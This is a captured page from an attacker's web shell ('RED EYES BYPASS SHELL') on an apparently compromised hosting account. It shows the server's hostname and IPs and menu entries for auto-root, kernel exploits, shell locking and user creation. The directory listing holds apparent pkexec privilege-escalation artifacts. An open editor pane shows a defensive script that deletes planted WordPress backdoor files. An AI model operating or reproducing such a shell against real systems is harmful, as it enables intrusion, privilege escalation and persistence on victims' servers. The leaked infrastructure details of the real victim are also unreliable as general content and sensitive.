Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
dr-xr-xr-x
ssl
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwx---r-x
.bash_history
17.05
KB
-rw-------
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.forward
35
B
-rw-------
.htaccess
221
B
-rw----r--
.ovhconfig
105
B
-rw----r--
.ovhconfig.backup-20260114-145705
106
B
-rw----r--
.red_eyes_root
0
B
-rw-r--r--
.viminfo
5.85
KB
-rw-------
.wget-hsts
168
B
-rw-r--r--
6digits.sh
1.44
KB
-rwx--xr-x
diagnostic-serveur.sh
9.44
KB
-rwxr-xr-x
fichiers_modifies.csv
11.33
KB
-rw-r--r--
nettoyage-backdoors-supplementaires.sh
2.38
KB
-rwxr-xr-x
nettoyage-index.php.sh
1.07
KB
-rwxr-xr-x
plan-mises-a-jour.sh
2.22
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
scan-complet.sh
10.77
KB
-rwxr-xr-x
verification-mises-a-jour.sh
5.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nettoyage-backdoors-supplementaires.sh
#!/bin/bash # # Script de nettoyage des backdoors supplémentaires détectés # set -e WP_ROOT="/home/eglisebaa/www" cd "$WP_ROOT" echo "🔴 NETTOYAGE DES BACKDOORS SUPPLÉMENTAIRES" echo "==========================================" echo "" # Liste des fichiers/répertoires malveillants à supprimer BACKDOORS=( "wp-admin/css/colors/coffee/widgets/index.php" "wp-admin/js/widgets/installers/137714/index.php" "wp-admin/js/widgets/installers/index.php" "wp-admin/user/106469/index.php" "wp-admin/includes/colors/726148/index.php" "wp-admin/images/includes/110056/index.php" "wp-content/mu-plugins/customize/817281" "wp-content/mu-plugins/customize/index.php" "wp-content/ai1wm-backups/579542/index.php" "wp-content/languages/themes/596990/index.php" "wp-content/languages/plugins/179808/index.php" "wp-content/themes/twentytwentyfour/parts/07/index.php" ) BACKUP_DIR="backups-malware-$(date +%Y%m%d-%H%M%S)" mkdir -p "$BACKUP_DIR" for item in "${BACKDOORS[@]}"; do if [ -e "$item" ]; then echo "📦 Sauvegarde: $item" mkdir -p "$BACKUP_DIR/$(dirname $item)" cp -r "$item" "$BACKUP_DIR/$item" 2>/dev/null || cp "$item" "$BACKUP_DIR/$item" if [ -d "$item" ]; then echo "🗑️ Suppression du répertoire: $item" rm -rf "$item" else echo "🗑️ Suppression du fichier: $item" rm -f "$item" fi echo "✅ Supprimé" echo "" fi done # Supprimer les répertoires vides suspects echo "🧹 Nettoyage des répertoires vides suspects..." find wp-admin/css/colors/coffee/widgets -type d -empty -delete 2>/dev/null || true find wp-admin/js/widgets/installers/137714 -type d -empty -delete 2>/dev/null || true find wp-admin/js/widgets/installers -type d -empty -delete 2>/dev/null || true find wp-admin/user/106469 -type d -empty -delete 2>/dev/null || true find wp-admin/includes/colors/726148 -type d -empty -delete 2>/dev/null || true find wp-admin/images/includes/110056 -type d -empty -delete 2>/dev/null || true find wp-content/ai1wm-backups/579542 -type d -empty -delete 2>/dev/null || true find wp-content/languages/themes/596990 -type d -empty -delete 2>/dev/null || true find wp-content/languages/plugins/179808 -type d -empty -delete 2>/dev/null || true echo "" echo "✅ NETTOYAGE TERMINÉ" echo "📁 Sauvegardes dans: $BACKUP_DIR" echo ""
Close